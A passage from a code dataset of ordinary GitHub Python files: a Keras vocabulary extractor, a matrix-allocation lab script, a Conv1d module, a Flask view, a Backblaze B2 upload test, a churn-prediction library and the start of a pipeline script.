types.BuiltinFunctionType,\n types.BuiltinMethodType,\n types.CodeType,\n types.CoroutineType,\n types.FrameType,\n types.GeneratorType,\n types.MappingProxyType,\n types.ModuleType, # TODO: probably should explore modules?\n types.SimpleNamespace,\n types.TracebackType,\n typing_MethodDescriptorType,\n typing_MethodWrapperType,\n typing_WrapperDescriptorType,\n tf.dtypes.DType\n}\n\n_function_type = types.FunctionType\n_lambda_type = types.LambdaType\n_method_type = types.MethodType\n\n_FUNCTION_TYPES = {\n _function_type,\n _lambda_type,\n _method_type,\n type # we check classes as well because their __init__ methods might have important vocabulary\n}\n\n# Maximum recursion depth of objects to explore when looking for vocabulary\n_MAX_RECURSION_DEPTH = 2\n\n# Maximum length of an iterable to explore\n_MAX_ITERABLE_LEN = 50\n\n# The name format for items found in literals\n_ITERABLE_ITEM_NAME_FORMAT = \"%s_Item\"\n\ndef _is_base_type(t):\n return t in _BASE_TYPES or any(issubclass(t, x) for x in _BASE_TYPES)\n\ndef _is_function_type(t):\n return any(issubclass(t, x) for x in _FUNCTION_TYPES)\n\ndef _is_magic_name(name):\n return name.startswith(\"__\")\n\ndef _is_private_name(name):\n \"\"\"\n Check if `name` starts with a single underscore. Note that this will return *False*\n for magic names like \"__init__\".\n \"\"\"\n return name.startswith(\"_\") and not _is_magic_name(name)\n\ndef _extract_vocab_recursive(obj, vg, context, depth=0):\n # Algorithm: For now, iterate recursively through every object's \"dir\".\n #\n # If a name is private (starts with a single underscore), we ignore it only if there's\n # an equivalent non-private name in the object dir. 
An example of this is tensorflow's\n # Operation._node_def, which has corresponding public attribute Operation.node_def.\n #\n # If an object is of type list, dict, or tuple, then the recursive extraction also applies\n # to each of the objects in the iterable (we limit the discovery to these types because these\n # are the safest classes to iterate over).\n #\n # If an object is of type string, and the string is non-empty, then the value of the \n # string is added to the vocab as well.\n #\n # If an object is a function type, inspect its arguments. If the object has **kwargs,\n # we can try to guess some of the parameters by looking at the object's __doc__.\n \n if depth >= _MAX_RECURSION_DEPTH or _is_base_type(type(obj)):\n return\n\n obj_dir = dir(obj)\n for name in obj_dir:\n if _is_magic_name(name):\n # Ignore magic stuff.\n continue\n\n if _is_private_name(name) and name[1:] in obj_dir:\n # Check here for private names with public counterparts\n continue\n \n attr = None\n try:\n attr = getattr(obj, name)\n except AttributeError:\n # Sometimes keras will throw an AttributeError for values that aren't initialized\n # yet in the current tensorflow session.\n continue\n\n attr_type = type(attr)\n # TODO: We should really also store a list of \"ignore\" types, for which we don't add the name.\n relation_type = WordRelations._get_attr_rel(attr_type)\n next_context = vg.add_node(name, context, relation_type)\n\n if (_is_base_type(attr_type) or _is_function_type(attr_type)) and attr is not None:\n\n # TODO: What happens if this list gets added to or removed from?\n\n # Note: when entering an iterable to search for new items, we actually increment\n # the depth by 2, since we're entering both the iterable attribute itself _and_\n # its items. \n if issubclass(attr_type, dict) and len(attr) <= _MAX_ITERABLE_LEN:\n for key, value in attr.items():\n if isinstance(key, str) and (_is_private_name(key) or _is_magic_name(key)):\n continue\n\n if _is_base_type(type(value)):\n continue\n # We build a node for the keyword itself built off the current context\n kw_context = vg.add_node(key, next_context, WordRelations.IS_ELEM_OF_D)\n\n _extract_vocab_recursive(value, vg, kw_context, depth+2)\n\n elif issubclass(attr_type, (list, tuple)) and len(attr) <= _MAX_ITERABLE_LEN:\n # TODO: This is REALLY fucky. The name given to items in a list is \"list_name[index]\". What if\n # the index of the item changes? I think a few things have to happen. First, lists and tuples\n # should be handled differently, since tuples are immutable (but can still be appended to\n # apparently with +). 
Second, the node name given to items found in the iterable should _not_\n # be dependent on the item's position in the iterable (unless, _maybe_ for tuples).\n for i, item in enumerate(attr):\n if _is_base_type(type(item)):\n continue\n\n node_name = _ITERABLE_ITEM_NAME_FORMAT % name\n elem_context = vg.add_node(node_name, next_context, WordRelations.IS_ELEM_OF_L)\n _extract_vocab_recursive(item, vg, elem_context, depth + 2)\n \n elif attr_type == str and attr:\n # The reason we do this is so that we can pick up on things like object names or keywords.\n # For example, if we asked \"What is the learning rate of model CNN1?\", it wouldn't be enough\n # to know that 'model' has a parameter 'name', we would also need to know that that specific\n # model's 'name' is equal to \"CNN1\" (or close enough).\n vg.add_node(attr, next_context, WordRelations.IS_VALUE_OF)\n\n elif _is_function_type(attr_type):\n try:\n parameters = inspect.signature(attr).parameters\n except ValueError: # Sometimes no signature is found. Happens occasionally for weird tf objects\n continue\n\n learn_from_doc = False\n for param_name, param in parameters.items():\n # If the name is \"args\" or \"kwargs\", then typically the list of valid keyword argument\n # names can be found somewhere in the function's docstring (assuming it's well documented).\n if (param_name == \"args\" and param.kind == inspect.Parameter.VAR_POSITIONAL) or \\\n (param_name == \"kwargs\" and param.kind == inspect.Parameter.VAR_KEYWORD):\n learn_from_doc = True\n continue\n\n relation_type = WordRelations.IS_ARG_OF\n if (param.kind == inspect.Parameter.VAR_POSITIONAL):\n relation_type = WordRelations.IS_VARG_OF\n elif (param.kind == inspect.Parameter.KEYWORD_ONLY):\n relation_type = WordRelations.IS_KWARG_OF\n elif (param.kind == inspect.Parameter.VAR_KEYWORD):\n relation_type = WordRelations.IS_VKWARG_OF\n\n vg.add_node(param_name, next_context, relation_type)\n\n if learn_from_doc:\n _learn_kwargs_from_doc(attr.__doc__, vg)\n else:\n # If this attribute isn't one of the base type cases above, \n # continue searching through its __dict__ for vocab.\n _extract_vocab_recursive(attr, vg, next_context, depth+1)\n\n # Now the fun stuff. We inject our own __getattribute__, __setattr__,\n # and __delattr__ into each object to dynamically update the vocab\n # graph.\n #\n # This does introduce significant overhead, and so can be turned off\n # with the global attribute ENABLE_DYNAMIC_VOCAB_UPDATES.\n if not GLOBALS.ENABLE_DYNAMIC_VOCAB_UPDATES:\n return\n\n\n # TODO: _inject_dynamic_vocab_updates should also be called on objects\n # of types (dict, list, tuple), which are handled separately above\n _inject_dynamic_vocab_updates(obj, vg, context)\n\ndef _learn_kwargs_from_doc(docstr, vg):\n # TIME FOR SOME NLP :O\n if not docstr:\n return\n\nclass _DynamicVocabWatcher:\n \"\"\"\n Empty base class for checking if we've already injected \n our dynamic vocab updating code into an object.\n \"\"\"\n pass\n\ndef _inject_dynamic_vocab_updates(obj, vg, context):\n \"\"\"Inject code into obj to dynamically watch changes to the object's __dict__.\"\"\"\n # WARNING: This code is ugly and magical.\n\n if isinstance(obj, _DynamicVocabWatcher):\n # Already injected dynamic vocab watching into the object.\n return\n \n # __slots__ indicates which attributes an object has access to. 
If __slots__ is set and\n # __slots__ doesn't contain __dict__, then the object's list of accessible attributes\n # won't change, meaning we don't need to worry about dynamically updating the vocab graph.\n #\n # Even if the object has __slots__ without __dict__, setting an attribute to a new \n # value still warrants updating the vocab graph, meaning we still have to override\n # __setattr__.\n has_immutable_slots = hasattr(obj, \"__slots__\") and \"__dict__\" not in obj.__slots__\n\n # Notes\n # =====\n # IMPORTANT NOTE: Inside the new _getattr, _setattr_, _delattr, we *can't* use\n # hasattr, getattr, setattr, or delattr, as this will create an infinite loop.\n\n # If the object has __getattr__, then this will be called ONLY when the attribute\n # being retrieved is _not_ already an attribute of the object. Hence, if we're\n # inside __getattr__, then hasattr(self, name) is implicitly False.\n\n # It may not seem like we have to worry about __getattr__ or __getattribute__ (since when\n # does the _retrieval_ of an attribute change the object's dict?), however there is a chance\n # the class has a __getattr__ override that does something magical like automatically returning\n # None regardless of whether or not the attribute is defined.\n\n object_getattr = object.__getattribute__ # This is the most basic \"getattr\" that doesn't involve any magic\n\n NoAttribute, NoItem = object(), object() # Unique identifiers\n\n _getattr_old = obj.__getattr__ if hasattr(obj, \"__getattr__\") else None\n _setattr_old = obj.__setattr__\n _delattr_old = obj.__delattr__\n \n def _getattr(self, name):\n # TODO: Do stuff in here.\n return _getattr_old(name)\n\n if has_immutable_slots:\n # If the object has immutable slots we can speed this up a ton by avoiding the\n # unnecessary try-except block.\n def _setattr(self, name, value):\n retrieved = object_getattr(self, name)\n if type(retrieved) != type(value):\n vg.remove_node_by_value(\n name, context, \n recursive=True,\n initial_relation=WordRelations._get_attr_rel(type(retrieved)))\n if not _is_base_type(type(value)):\n vg.add_node(name, context, WordRelations._get_attr_rel(type(value)))\n _setattr_old(name, value)\n else:\n def _setattr(self, name, value):\n try:\n retrieved = object_getattr(self, name)\n except:\n retrieved = NoAttribute\n val_type = type(value)\n if retrieved == NoAttribute and not _is_base_type(val_type):\n vg.add_node(name, context, WordRelations._get_attr_rel(val_type))\n elif type(retrieved) != val_type:\n vg.remove_node_by_value(\n name, context, \n recursive=True, \n initial_relation=WordRelations._get_attr_rel(type(retrieved)))\n if not _is_base_type(val_type):\n vg.add_node(name, context, WordRelations._get_attr_rel(val_type))\n _setattr_old(name, value)\n \n def _delattr(self, name):\n try:\n retrieved = object_getattr(self, name)\n except AttributeError:\n # if we can't retrieve the object then we can't delete it either\n # so just call delattr and throw the error regardless.\n pass\n _delattr_old(name)\n vg.remove_node_by_value(\n name, context, \n recursive=True, \n initial_relation=WordRelations._get_attr_rel(type(retrieved)))\n\n _setitem = _delitem = None\n if isinstance(obj, (dict, list, tuple)):\n if isinstance(obj, (list, tuple)):\n node_name = _ITERABLE_ITEM_NAME_FORMAT % context.value\n new_node_format = lambda item: node_name\n word_relation = WordRelations.IS_ELEM_OF_L\n else:\n new_node_format = lambda item: item\n word_relation = WordRelations.IS_ELEM_OF_D\n _getitem_old = obj.__getitem__\n _setitem_old = 
obj.__setitem__\n _delitem_old = obj.__delitem__\n def _setitem(self, item, value):\n try:\n retrieved = _getitem_old(item)\n except:\n retrieved = NoItem\n val_type = type(value)\n if retrieved == NoItem and not _is_base_type(val_type):\n vg.add_node(new_node_format(item), context, word_relation)\n else:\n if type(retrieved) != val_type:\n vg.remove_node_by_value(\n new_node_format(item), context, \n recursive=True, \n initial_relation=word_relation)\n if not _is_base_type(val_type):\n vg.add_node(new_node_format(item), context, word_relation)\n _setitem_old(item, value)\n\n def _delitem(self, item):\n _delitem_old(item)\n vg.remove_node_by_value(\n new_node_format(item), context, \n recursive=True, \n initial_relation=word_relation)\n\n new__dict__ = {\n \"__getattr__\" : _getattr,\n \"__setattr__\" : _setattr,\n \"__delattr__\" : _delattr\n }\n if _setitem:\n new__dict__[\"__setitem__\"] = _setitem\n if _delitem:\n new__dict__[\"__delitem__\"] = _delitem\n\n try:\n # Magic\n obj.__class__ = type(\n \"_%s\" % obj.__class__.__name__,\n (obj.__class__, _DynamicVocabWatcher),\n new__dict__\n )\n except:\n # Sometimes an object's metaclass prevents it from being subclassed, preventing the\n # above trick from working. If this is the case, then maybe there's something else\n # we can do?\n \n # TODO (low priority): Figure out if there's some other way to monitor updates dynamically.\n return\n\nclass VocabExtractor:\n \"\"\"\n A VocabExtractor maintains a Vocabulary for a CrooshToost session, with a Vocabulary consisting\n of a set of words CrooshToost is familiar with related to the current session's model.\n \"\"\"\n\n def __init__(self):\n self.vocab = VocabGraph(_DEFAULT_VOCAB[::])\n\n def extract_initial_vocab(self, model):\n model_node = self.vocab.add_node(model.name, None, None)\n\n # Model Layers\n for layer in model.layers:\n self.vocab.add_node(\n layer.name, model_node, WordRelations.IS_KERAS_LAYER_OF)\n\n # List of the callbacks\n if (hasattr(model, \"callbacks\")):\n # TODO: Ensure models managed by CT have a \"callbacks\" attribute.\n for callback in model.callbacks: # `model.callbacks` doesn't exist in keras!\n self.vocab.add_node(\n type(callback).__name__, model_node, WordRelations.IS_KERAS_CALLBACK_OF)\n\n _extract_vocab_recursive(model, self.vocab, model_node)\n \n def follow(self, dict, contexts={}):\n \"\"\"\n At certain CrooshToost managed pieces of code (model fitting, preprocessing code run in CT, etc.),\n VocabExtractor.follow(dict, contexts) is used to add potentially new vocabulary to the currently\n maintained vocabulary along with the context(s) in which that vocabulary is found.\n\n The idea of this method is to \"decorate\" important function calls. 
So for example, instead of calling\n\n model.fit(x=inputs, y=outputs, batch_size=4, epochs=50, callbacks=callbacks)\n\n you would call\n model.fit(\n vocab_extractor.follow(\n {\"x\" : inputs, \"y\" : outputs, \"batch_size\" : 4, \"epochs\" : 50, \"callbacks\" : callbacks},\n contexts=contexts))\n \"\"\"\n\n # TODO: Implement this properly\n # TODO: Figure out what \"contexts\" should be, or if it's even necessary.\n raise NotImplementedError\n # return dict # Eventually\n \nif __name__ == \"__main__\":\n # quick testing utilities\n\n def test_keras():\n from pprint import pprint\n from keras.models import Model\n from keras.layers import Input, Dense, Softmax\n from keras.callbacks import LearningRateScheduler, TensorBoard, LambdaCallback\n from keras.optimizers import SGD\n\n x = inputs = Input(shape=(10,))\n x = Dense(40)(x)\n x = Dense(10)(x)\n x = Softmax()(x)\n\n model = Model(inputs=inputs, outputs=x)\n\n model.callbacks = [\n LearningRateScheduler(schedule = lambda epoch: 1/(1 + epoch)**.55),\n TensorBoard(),\n LambdaCallback(on_epoch_begin=lambda epoch, logs={}: None)\n ]\n\n sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(loss='mse', optimizer=sgd)\n\n vocab_extractor = VocabExtractor()\n vocab_extractor.extract_initial_vocab(model)\n\n pprint(vocab_extractor.vocab)\n \n def test_vg():\n class A:\n def __init__(self, attr1, attr2):\n self.attr1 = attr1\n self.attr2 = attr2\n\n def method_1(self):\n pass\n\n def method_2(self, arg1, arg2):\n pass\n\n class B:\n def __init__(self):\n self.property = \"Hey!\"\n \n def method_1(self, thing):\n pass\n\n class C:\n def __init__(self):\n self.dict = {\n \"Entry 1\" : 1,\n \"Entry 2\" : 2\n }\n self.list = [D(), E()]\n\n self.function = lambda hey, you, *args, **kwargs: None\n\n class D:\n cls_thing = \":O\"\n \n class E:\n def __init__(self):\n self.a = A(1, 2)\n\n a = A(B(), C())\n\n from pprint import pprint\n vg = VocabGraph([])\n root_node = vg.add_node(\"a\", None, None)\n _extract_vocab_recursive(a, vg, root_node)\n pprint(vg._graph_by_values)\n\n test_vg()","repo_name":"michaelala25/crooshtoost","sub_path":"crooshtoost/language_processing/vocab_extractor.py","file_name":"vocab_extractor.py","file_ext":"py","file_size_in_byte":21696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8546871067","text":"matrix = [[0, 1, 0, 1, 0],\r\n [1, 0, 1, 1, 1],\r\n [0, 0, 0, 0, 1],\r\n [1, 1, 0, 0, 0],\r\n [0, 1, 1, 1, 0]]\r\n\r\n\r\n# control function\r\ndef plan(matrix):\r\n resources = []\r\n requests = []\r\n for i in range(len(matrix)):\r\n resources.append(i)\r\n requests.append(i)\r\n\r\n for i in range(len(matrix)):\r\n # find min row and swap it with first\r\n row_index = search_min_row(matrix, i)\r\n swap_rows(matrix, i, row_index)\r\n resources[i], resources[row_index] = resources[row_index], resources[i]\r\n\r\n # find min column where first element is 1 and swap it with first column\r\n column_index = search_min_column(matrix, i)\r\n swap_columns(matrix, i, column_index)\r\n requests[i], requests[column_index] = requests[column_index], requests[i]\r\n\r\n\r\n print(\"Send request %s to resource %s\" % (requests[i], resources[i]))\r\n\r\n\r\n\r\ndef print_matrix(matrix):\r\n for i in matrix:\r\n print(i)\r\n\r\n\r\n# search row with min count of 1 in submatrix\r\ndef search_min_row(matrix, start): # start - variable that help define submatrix\r\n min = len(matrix)\r\n row_index = -1\r\n for i in range(start, len(matrix)):\r\n a = 
sum(matrix[i][start::])\r\n if a < min:\r\n min = a\r\n row_index = i\r\n return row_index\r\n\r\n\r\n# search column with min sum that start with 1\r\ndef search_min_column(matrix, start):\r\n min = len(matrix)\r\n column_index = -1\r\n for i in range(start, len(matrix)):\r\n if matrix[start][i] == 1:\r\n a = sum(matrix[x][i] for x in range(start, len(matrix)))\r\n if a < min:\r\n min = a\r\n column_index = i\r\n return column_index\r\n\r\n\r\n# changes the columns in places\r\ndef swap_columns(matrix, a, b):\r\n for i in range(len(matrix)):\r\n matrix[i][a], matrix[i][b] = matrix[i][b], matrix[i][a]\r\n\r\n\r\n# changes the rows in places\r\ndef swap_rows(matrix, a, b):\r\n matrix[a], matrix[b] = matrix[b], matrix[a]\r\n\r\n\r\n# # set all elements in first row and first column of submatrix as 0 except first element that is 1\r\n# def set_zeroes(matrix, start):\r\n# matrix[start][start] = 1\r\n# for i in range(start + 1, len(matrix)):\r\n# matrix[start][i] = 0\r\n# matrix[i][start] = 0\r\n#\r\n#\r\n# # represent matrix in comfortable format\r\n# def sort_matrix(arr, matrix, type):\r\n# for i in range(len(arr) - 1):\r\n# for j in range(i + 1, len(arr)):\r\n# if arr[i] > arr[j]:\r\n# arr[i], arr[j] = arr[j], arr[i]\r\n# swap_rows(matrix, i, j) if type == 1 else swap_columns(matrix, i, j)\r\n\r\n\r\nprint(\"Start matrix:\")\r\nprint_matrix(matrix)\r\nprint()\r\n\r\nplan(matrix)","repo_name":"Siusarna/Lab4","sub_path":"lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21015586033","text":"import torch.nn as nn\nimport torch\nimport numpy as np\n\n__all__ = ['Conv']\n\n\nclass DepthwiseSeparableConv1d(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size, padding):\n super(DepthwiseSeparableConv1d, self).__init__()\n self.block = nn.Sequential(\n nn.Conv1d(in_channels=in_channels, \n out_channels=in_channels,\n kernel_size=kernel_size, \n padding=padding,\n groups=in_channels), \n nn.Conv1d(in_channels=in_channels, \n out_channels=out_channels,\n kernel_size=1), \n nn.LeakyReLU(negative_slope=0.1, \n inplace=True)\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass Conv(nn.Module):\n \"\"\" Convolutional architecture with variable receptive field.\n \"\"\"\n\n def __init__(self, \n receptive_field, \n points_per_unit, \n num_layers, \n num_channels):\n super(Conv, self).__init__()\n\n kernel_size = self._compute_kernel_size(receptive_field, \n points_per_unit, \n num_layers)\n\n print(f'kernel size = {kernel_size}')\n padding = kernel_size // 2\n\n layers = []\n\n for _ in range(num_layers):\n layers += [DepthwiseSeparableConv1d(num_channels, \n num_channels, \n kernel_size, \n padding)]\n\n self.net = nn.Sequential(*layers)\n\n self.num_halving_layers = 0\n self.in_channels = num_channels\n self.out_channels = num_channels\n self.num_channels = num_channels\n\n def forward(self, x):\n output = self.net(x)\n return output\n\n @staticmethod\n def _compute_kernel_size(receptive_field, points_per_unit, num_layers):\n receptive_points = receptive_field * points_per_unit\n kernel_size = 1 + (receptive_points - 1) / num_layers\n return int(np.ceil(kernel_size) // 2 * 2 + 1)\n\n @property\n def num_params(self):\n \"\"\"Number of parameters in model.\"\"\"\n return np.sum([torch.tensor(param.shape).prod()\n for param in 
self.parameters()])\n","repo_name":"ashysheya/Neural_CDE_CNP","sub_path":"lib/architectures.py","file_name":"architectures.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23584772688","text":"'''\nRender the AWS pages.\n'''\nfrom flask import Blueprint\nfrom flask import render_template\nimport app.views.template as template\nimport app.models.aws as model\n\nview = Blueprint('aws',\n __name__,\n url_prefix='/aws')\n\n@view.route('/')\n@view.route('/<id>')\ndef show(id=None):\n if id:\n # single article\n return template.render('aws/show.html', \n content=model.get_content(id))\n else:\n # article list\n return template.render('aws/index.html', \n contents_list=model.get_list())\n\n","repo_name":"k0b4314/cloud-workshop","sub_path":"web/app/views/aws.py","file_name":"aws.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26327399915","text":"import os\nimport pytest\nimport uuid\nimport logging\nimport datetime\nfrom pathlib import Path\n\nfrom aiob2 import Client\nfrom .conftest import ValueStorage\n\npath = Path(__file__).resolve().parent / 'payloads/test_image.jpg'\nbucket_id = os.environ['BUCKET_ID']\n\n\nclass TestUpload:\n @pytest.mark.asyncio\n @pytest.mark.order(1)\n async def test_upload(self):\n client = Client(os.environ['KEY_ID'], os.environ['KEY'], log_level=logging.DEBUG)\n file_name = str(uuid.uuid4())\n\n file = await client.upload_file(\n file_name=file_name,\n content_bytes=path.read_bytes(),\n bucket_id=bucket_id,\n content_type='image/jpeg',\n content_disposition='inline; filename=\"foo.jpg\"',\n content_language=['en', 'ru'],\n expires=datetime.datetime.now() + datetime.timedelta(minutes=5),\n comments={'foo': 'bar'},\n server_side_encryption='AES256'\n )\n\n assert file.name == file_name\n assert file.bucket_id == bucket_id\n assert file.content_type == 'image/jpeg'\n assert file.server_side_encryption['algorithm'] == 'AES256' # type: ignore\n\n # some more tests relating to this will be performed in the download,\n # such as, the disposition, language, expires and comments.\n\n ValueStorage.test_upload_file = file\n\n await client.close()\n","repo_name":"Void-ux/aiob2","sub_path":"tests/test_upload.py","file_name":"test_upload.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"28137538510","text":"# library doc string\n'''\nAuthor: Leen\nVersion: 0.1\nDate: 12/12/2021\nThis module provides a set of functions that will predict customer churn, \nguaranteeing readability and modularization\n'''\n\n# import libraries\nfrom sklearn.metrics import plot_roc_curve, classification_report\nfrom sklearn.model_selection import GridSearchCV, train_test_split\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import normalize\nimport scikitplot as skplt\nimport pandas as pd\nimport numpy as np\nimport shap\nimport joblib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\n\ndef import_data(pth):\n '''\n returns dataframe for the csv found at pth\n\n input:\n pth: a path to the csv\n output:\n df: pandas dataframe\n '''\n data = pd.DataFrame()\n try:\n assert isinstance(pth, str)\n data = pd.read_csv(pth)\n except AssertionError as msg:\n print(\"The given path is not a string\")\n print(msg)\n\n 
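# note: on any failure import_data falls through and returns the empty DataFrame\n    # created at the top, so callers may want to check df.empty.\n    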
except FileNotFoundError as msg:\n print(\"The given path could not be found\")\n print(msg)\n return data\n\n\ndef perform_eda(df):\n '''\n perform eda on df and save figures to images folder\n input:\n df: pandas dataframe\n\n output:\n None\n '''\n try:\n assert isinstance(df, pd.DataFrame)\n \n plt.figure(figsize=(20, 10))\n df['Churn'].hist()\n plt.savefig('images/eda/churn.png')\n\n plt.figure(figsize=(20, 10))\n df['Customer_Age'].hist()\n plt.savefig('images/eda/customer_age.png')\n\n plt.figure(figsize=(20, 10))\n df.Marital_Status.value_counts('normalize').plot(kind='bar')\n plt.savefig('images/eda/marital_status.png')\n\n plt.figure(figsize=(20, 10))\n sns.distplot(df['Total_Trans_Ct'])\n plt.savefig('images/eda/total_trans_ct.png')\n\n plt.figure(figsize=(20, 10))\n sns.heatmap(df.corr(), annot=False, cmap='Dark2_r', linewidths=2)\n plt.savefig('images/eda/heat_map.png')\n\n except AssertionError as msg:\n print(\"The given argument is not a pandas DataFrame\")\n print(msg)\n except:\n print(\"Exception in perform_eda\")\n\n\ndef encoder_helper(df, category_lst, response):\n '''\n helper function to turn each categorical column into a new column with\n propotion of churn for each category - associated with cell 15 from the notebook\n\n input:\n df: pandas dataframe\n category_lst: list of columns that contain\n categorical features\n response: string of response name [optional argument \n that could be used for naming variables or index y column]\n\n output:\n df: pandas dataframe with new columns for\n '''\n try:\n assert isinstance(category_lst, list)\n assert isinstance(response, list)\n assert isinstance(df, pd.DataFrame)\n i = 0\n for cat in category_lst:\n # encoded column\n cat_lst = []\n cat_groups = df.groupby(cat).mean()['Churn']\n\n for val in df[cat]:\n cat_lst.append(cat_groups.loc[val])\n\n df[response[i]] = cat_lst\n i = i + 1\n return df\n\n except AssertionError as msg:\n print('the parameters are incorrect types')\n print(msg)\n\n except BaseException:\n print('exception in encoder helper!')\n\n\ndef perform_feature_engineering(df, response):\n '''\n input:\n df: pandas dataframe\n response: string of response name [optional argument that could be used for naming variables or index y column]\n\n output:\n X_train: X training data\n X_test: X testing data\n y_train: y training data\n y_test: y testing data\n '''\n try:\n assert isinstance(df, pd.DataFrame)\n assert isinstance(response, str)\n y = df[response]\n X = df.drop(columns=response)\n\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, random_state=42)\n\n return X_train, X_test, y_train, y_test\n\n except AssertionError as msg:\n print('parameter types are incorrect')\n print(msg)\n except BaseException as msg:\n print('Exception in perform_feature_engineering')\n print(msg)\n\n\ndef classification_report_image(y_train,\n y_test,\n y_train_preds_lr,\n y_train_preds_rf,\n y_test_preds_lr,\n y_test_preds_rf):\n '''\n produces classification report for training and testing results and stores report as image\n in images folder\n input:\n y_train: training response values\n y_test: test response values\n y_train_preds_lr: training predictions from logistic regression\n y_train_preds_rf: training predictions from random forest\n y_test_preds_lr: test predictions from logistic regression\n y_test_preds_rf: test predictions from random forest\n\n output:\n None\n '''\n \n try:\n assert isinstance(y_train, list)\n assert isinstance(y_test, list)\n assert isinstance(y_train_preds_lr, list)\n assert 
isinstance(y_train_preds_rf, list)\n assert isinstance(y_test_preds_lr, list)\n assert isinstance(y_test_preds_rf, list)\n\n plt.rc('figure', figsize=(5, 5))\n plt.text(0.01, 1.25, str('Random Forest Train'), {\n 'fontsize': 10}, fontproperties='monospace')\n plt.text(0.01, 0.7, str(classification_report(y_train, y_train_preds_rf)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n plt.text(0.01, 0.6, str('Random Forest Test'), {\n 'fontsize': 10}, fontproperties='monospace')\n plt.text(0.01, 0.05, str(classification_report(y_test, y_test_preds_rf)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n plt.axis('off')\n plt.savefig('images/results/random_forest_report.png')\n\n plt.rc('figure', figsize=(5, 5))\n plt.text(0.01, 1.25, str('Logistic Regression Train'),\n {'fontsize': 10}, fontproperties='monospace')\n plt.text(0.01, 0.7, str(classification_report(y_train, y_train_preds_lr)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n plt.text(0.01, 0.6, str('Logistic Regression Test'), {\n 'fontsize': 10}, fontproperties='monospace')\n\n plt.text(0.01, 0.05, str(classification_report(y_test, y_test_preds_lr)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n plt.axis('off')\n plt.savefig('images/results/logistic_regression_report.png')\n \n except AssertionError as msg:\n print('one of the parameters is not a list')\n print(msg)\n\ndef feature_importance_plot(model, X_data, output_pth):\n '''\n creates and stores the feature importances in pth\n input:\n model: model object containing feature_importances_\n X_data: pandas dataframe of X values\n output_pth: path to store the figure\n\n output:\n None\n '''\n try:\n assert isinstance(X_data, pd.DataFrame)\n assert isinstance(output_pth, str)\n #unsure how to check for model instance without specifiying if its logistic regression\n #or Random Forest\n \n # Calculate feature importances\n importances = model.best_estimator_.feature_importances_\n # Sort feature importances in descending order\n indices = np.argsort(importances)[::-1]\n\n # Rearrange feature names so they match the sorted feature importances\n names = [X_data.columns[i] for i in indices]\n\n # Create plot\n plt.figure(figsize=(20, 5))\n\n # Create plot title\n plt.title(\"Feature Importance\")\n plt.ylabel('Importance')\n\n # Add bars\n plt.bar(range(X_data.shape[1]), importances[indices])\n\n # Add feature names as x-axis labels\n plt.xticks(range(X_data.shape[1]), names, rotation=90)\n\n plt.savefig(output_pth + '/feature_importance.png')\n \n except AssertionError as msg:\n print('the parameters are incorrect types')\n print(msg)\n\ndef train_models(X_train, X_test, y_train, y_test):\n '''\n train, store model results: images + scores, and store models\n input:\n X_train: X training data\n X_test: X testing data\n y_train: y training data\n y_test: y testing data\n output:\n None\n '''\n \n try:\n assert isinstance(y_train, list)\n assert isinstance(y_test, list)\n assert isinstance(X_train, pd.DataFrame)\n assert isinstance(X_test, pd.DataFrame)\n \n # grid search\n rfc = RandomForestClassifier(random_state=42)\n lrc = LogisticRegression()\n param_grid = {\n 'n_estimators': [200, 500],\n 'max_features': ['auto', 'sqrt'],\n 'max_depth': [4, 5, 100],\n 'criterion': ['gini', 'entropy']\n }\n cv_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5)\n cv_rfc.fit(X_train, y_train)\n lrc.fit(X_train, 
y_train)\n y_train_preds_rf = cv_rfc.best_estimator_.predict(X_train)\n y_test_preds_rf = cv_rfc.best_estimator_.predict(X_test)\n y_train_preds_lr = lrc.predict(X_train)\n y_test_preds_lr = lrc.predict(X_test)\n\n lrc_plot = plot_roc_curve(lrc, X_test, y_test)\n # the RocCurveDisplay returned above exposes its figure via .figure_\n lrc_plot.figure_.savefig('images/results/lr_roc_curve.png')\n skplt.metrics.plot_roc_curve(y_test, lrc.predict_proba(X_test))\n plt.savefig('images/results/lr_roc_auc.png')\n\n # plots\n plt.figure(figsize=(15, 8))\n ax = plt.gca()\n rfc_disp = plot_roc_curve(\n cv_rfc.best_estimator_,\n X_test,\n y_test,\n ax=ax,\n alpha=0.8)\n lrc_plot.plot(ax=ax, alpha=0.8)\n plt.savefig('images/results/comparative_roc_auc.png')\n\n # save best model\n joblib.dump(cv_rfc.best_estimator_, './models/rfc_model.pkl')\n joblib.dump(lrc, './models/logistic_model.pkl')\n \n except AssertionError as msg:\n print('Incorrect parameters: make sure X values are dataframes and Y values are a list')\n print(msg)\n except:\n print('Exception in Training function')","repo_name":"leenaltwayan/Predicting_Customer_Churn","sub_path":".ipynb_checkpoints/churn_library-checkpoint.py","file_name":"churn_library-checkpoint.py","file_ext":"py","file_size_in_byte":10711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24740068470","text":"import numpy as np\nimport pandas as pd\n\nfrom pipeline_helper_functions import *\nfrom bag_of_words import *\n\n# list of possible vertex metrics\nvertex_metrics = ['indegree', 'outdegree', 'degree', 